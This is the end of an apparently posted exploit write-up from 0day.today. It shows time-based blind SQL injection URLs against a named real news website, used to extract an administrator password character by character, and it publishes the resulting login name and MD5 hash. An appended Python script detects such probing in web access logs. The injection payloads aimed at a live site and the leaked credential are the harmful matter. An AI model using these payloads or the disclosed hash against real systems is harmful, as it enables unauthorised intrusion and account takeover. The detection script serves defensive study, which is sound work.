http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,24,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

25th character: f


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,25,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

26th character: 0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,26,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

27th character: 0

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,27,1)='0',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

28th character: 7


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,28,1)='7',sleep(1),0) from ulist limit 1,1)-- AnD  5='5



================================================

29th character: 2


http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,29,1)='2',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================

30th character: 8

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,30,1)='8',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

31st character: 3

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,31,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


================================================

32nd character: f

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,32,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5

================================================

Login: mogin
MD5 HASH: e79d2f315e99cac9009fe36ef007283f
The hash didn't crack :( Damn, it was bad luck from start to finish :*(

//TRUE

http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,33)='e79d2f315e99cac9009fe36ef007283f',sleep(1),0) from ulist limit 1,1)-- AnD  5='5


===========================================================

Enjoy)


/AkaStep



#  0day.today [2018-01-01]  #
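
Added example for defenders (not part of the original advisory and not the vendor's code): a log-review script that flags the request shapes shown above, namely a quote break-out followed by `sleep()`, conditional `substr`/`length`/`count` probes and `information_schema` lookups, and groups requests that differ only in position or guessed character. The log layout (a trailing request-time field in seconds), the function names and the sample lines are assumptions constructed for illustration; the client addresses come from documentation ranges.

```python
"""Flag time-based blind SQL injection probing in web access logs."""
import re
from collections import defaultdict
from urllib.parse import unquote

# Assumed layout: client, ident, user, [time], "request", status, size, seconds.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>.*?) HTTP/[\d.]+" '
    r'\d{3} \S+ (?P<secs>\d+(?:\.\d+)?)$'
)

# Indicators taken from the payload shapes in the advisory.
INDICATORS = {
    "sleep_call": re.compile(r"\bsleep\s*\(", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "conditional_probe": re.compile(r"\bif\s*\(\s*(substr|length|count)\s*\(", re.I),
    "quote_breakout": re.compile(r"'\s*or\b", re.I),
    "comment_tail": re.compile(r"--\s"),
    "hex_literal": re.compile(r"=\s*0x[0-9a-f]{4,}", re.I),
}


def indicators_for(target):
    """Return the names of all indicators present in a URL-decoded target."""
    decoded = unquote(target)
    return {name for name, rx in INDICATORS.items() if rx.search(decoded)}


def template_of(target):
    """Collapse guessed literals and numbers so enumeration steps group together."""
    s = unquote(target).lower()
    s = re.sub(r"([=<>])\s*'[^',)]*'", r"\1'?'", s)  # ='a' and ='b' become ='?'
    return re.sub(r"\d+", "N", s)                     # positions, offsets, delays


def analyze(lines, min_indicators=2, min_variants=3, slow_secs=1.0):
    """Group suspicious requests per client and template; report each group."""
    groups = defaultdict(lambda: {"targets": set(), "indicators": set(), "slow": 0})
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        hits = indicators_for(m["target"])
        if len(hits) < min_indicators:
            continue  # a single weak signal is not enough to flag a request
        g = groups[(m["ip"], template_of(m["target"]))]
        g["targets"].add(m["target"])
        g["indicators"] |= hits
        g["slow"] += float(m["secs"]) >= slow_secs  # delayed answers = TRUE branch
    findings = []
    for (ip, template), g in groups.items():
        variants = len(g["targets"])
        findings.append({
            "ip": ip,
            "template": template,
            "variants": variants,
            "slow": g["slow"],
            "indicators": sorted(g["indicators"]),
            # Many variants of one template is the character-by-character pattern.
            "kind": "enumeration" if variants >= min_variants else "probe",
        })
    return sorted(findings, key=lambda f: -f["variants"])


# Constructed sample log lines (not captured traffic).
SAMPLE_LOG = """\
198.51.100.20 - - [04/Sep/2012:10:00:00 +0000] "GET /am/news/50/ HTTP/1.1" 200 5120 0.035
203.0.113.7 - - [04/Sep/2012:10:00:01 +0000] "GET /am/news/50'%20or%20sleep(10)--%20and%205='5/ HTTP/1.1" 200 5120 10.031
203.0.113.7 - - [04/Sep/2012:10:00:20 +0000] "GET /am/news/1'%20or%20(select%20if(substr(table_name,1,1)='a',sleep(1),0)%20from%20information_schema.tables%20limit%201)--%20AnD%205='5 HTTP/1.1" 200 5120 0.041
203.0.113.7 - - [04/Sep/2012:10:00:21 +0000] "GET /am/news/1'%20or%20(select%20if(substr(table_name,1,1)='b',sleep(1),0)%20from%20information_schema.tables%20limit%201)--%20AnD%205='5 HTTP/1.1" 200 5120 0.039
203.0.113.7 - - [04/Sep/2012:10:00:22 +0000] "GET /am/news/1'%20or%20(select%20if(substr(table_name,1,1)='c',sleep(1),0)%20from%20information_schema.tables%20limit%201)--%20AnD%205='5 HTTP/1.1" 200 5120 1.044
203.0.113.7 - - [04/Sep/2012:10:00:24 +0000] "GET /am/news/1'%20or%20(select%20if(substr(table_name,2,1)='a',sleep(1),0)%20from%20information_schema.tables%20limit%201)--%20AnD%205='5 HTTP/1.1" 200 5120 1.040
198.51.100.20 - - [04/Sep/2012:10:01:00 +0000] "GET /am/news/51/ HTTP/1.1" 200 5120 0.033
"""

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG.splitlines()):
        print(finding["kind"], finding["ip"], finding["variants"],
              finding["slow"], finding["indicators"])
```

A group reported as `enumeration` with a mix of fast and delayed responses means the injection point answered the probes, so the affected parameter needs a parameterized query and the stored credentials should be treated as exposed.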
